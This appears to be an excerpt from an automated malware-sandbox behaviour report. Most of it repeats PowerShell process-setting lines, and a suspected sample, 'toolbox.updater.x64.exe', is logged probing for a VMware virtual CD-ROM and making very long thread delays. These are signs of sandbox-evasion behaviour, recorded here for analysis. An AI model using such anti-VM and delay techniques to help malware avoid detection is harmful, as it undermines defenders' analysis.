Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeWindow / User API: threadDelayed 1674Jump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeWindow / User API: threadDelayed 1482Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1819Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 986Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1453Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 775Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4709Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1784Jump to behavior
